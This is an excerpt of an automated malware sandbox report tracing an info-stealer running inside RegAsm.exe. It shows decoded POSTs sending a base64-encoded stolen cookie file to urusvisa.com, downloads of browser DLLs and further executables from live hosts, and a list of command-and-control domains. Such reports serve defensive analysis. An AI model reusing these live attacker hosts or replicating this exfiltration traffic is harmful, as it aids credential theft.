37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 2d 2d 0d 0a Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="token"9ec5706c37b0f5f00416c09436d546c7------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="mode"1------EHCBAAAFHJDHJJKEBGHI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCBHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 63 35 37 30 36 63 33 37 62 30 66 35 66 30 30 34 31 36 63 30 39 34 33 36 64 35 34 36 63 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 2d 2d 0d 0a Data Ascii: ------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="token"9ec5706c37b0f5f00416c09436d546c7------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="mode"2------FIJECAEHJJJKJKFIDGCB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFHHost: urusvisa.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 63 35 37 30 36 63 33 37 62 30 66 35 66 30 30 34 31 36 63 30 39 34 33 36 64 35 34 36 63 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="token"9ec5706c37b0f5f00416c09436d546c7------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="mode"21------CAFIJKFHIJKKEBGCFBFH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKEHost: urusvisa.comContent-Length: 7593Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: urusvisa.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 63 35 37 30 36 63 33 37 62 30 66 35 66 30 30 34 31 36 63 30 39 34 33 36 64 35 34 36 63 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="token"9ec5706c37b0f5f00416c09436d546c7------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="file_name"Q29va2llc

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49723 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49730 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49732 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49733 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: underlinemdsj.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chaptermusu.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: possiwreeste.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: possiwreeste.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: underlinemdsj.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chaptermusu.store

Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.231.109

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00406963

Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e24bf01cb1dccc3d2c_1091684912320142115
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e24bf01cb1dccc3d2c_1091684912320142115
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2ae906657_snd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: urusvisa.com
Source: global traffic	DNS traffic detected: DNS query: files.veritas.org.ng
Source: global traffic	DNS traffic detected: DNS query: possiwreeste.site
Source: global traffic	DNS traffic detected: DNS query: famikyjdiag.site
Source: global traffic	DNS traffic detected: DNS query: commandejorsk.site
Source: global traffic	DNS traffic detected: DNS query: underlinemdsj.site
Source: global traffic	DNS traffic detected: DNS query: bellykmrebk.site
Source: global traffic	DNS traffic detected: DNS query: agentyanlark.site
Source: global traffic	DNS traffic detected: DNS query: writekdmsnu.site
Source: global traffic	DNS traffic detected: DNS query: delaylacedmn.site
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: chaptermusu.store
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: underlinemdsj.site

Source: RegAsm.exe, 0000001B.00000002.2762920375.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Http://urusvisa.com:80/sql.dllFgqacPdLggz.exe
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dllU
Source: RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dllM
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php(w
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php1f9a9c4a2f8b514.cdf-ms
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php=
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpLxSt
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpexe
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpngPreference.Verb
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpq
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109s
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.GHCAAKEBKECB
